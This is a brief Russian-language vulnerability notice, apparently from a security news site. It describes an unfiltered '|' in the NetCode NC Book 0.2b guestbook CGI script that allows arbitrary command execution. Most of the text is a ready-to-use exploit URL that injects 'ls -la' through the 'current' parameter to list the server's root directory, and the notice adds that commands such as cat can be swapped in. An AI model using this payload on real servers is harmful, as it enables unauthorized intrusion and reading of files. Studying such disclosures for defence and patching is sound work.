Уязвимость в основном сценарии guestbook позволяет выполнить любые команды на сервере (нефильтруемый '|'). 

Уязвимость работает в NetCode NC Book 0.2b.

Эксплоит (выводит содержание корневой директории, можно добавить любые команды типа ls, cat и т.п):

http://target/cgi-bin/ncbook/ book.cgi?action=default&current=|ls  -la/|&form_tid=996604045&prev=
main.html&list_message_index=10

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии